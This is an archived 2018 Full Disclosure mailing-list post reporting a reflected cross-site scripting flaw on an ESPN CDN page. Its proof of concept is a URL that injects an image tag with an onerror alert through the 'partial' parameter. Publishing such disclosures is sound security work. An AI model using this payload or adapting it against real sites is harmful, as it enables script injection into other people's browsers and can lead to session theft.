[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] ESPN Reflected XSS

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] ESPN Reflected XSS
From: Ismail Doe <ismail.sec.dev@xxxxxxxxx>
Date: Tue, 5 Jun 2018 17:50:19 -0400

Document Title:
===============

Reflected XSS on ESPN site


PoC:

===============


1) Navigate to the following URL:


http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en&region=us&platform=ios


2) Note that the form alerts with the payload

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Multiple Automated Logic Corporation WebCTRL XML External Entity Injection (CVE-2018-8819)
Next by Date: [FD] Open-Xchange Security Advisory 2018-06-08
Previous by thread: [FD] Multiple Automated Logic Corporation WebCTRL XML External Entity Injection (CVE-2018-8819)
Next by thread: [FD] Open-Xchange Security Advisory 2018-06-08
Index(es):
- Date
- Thread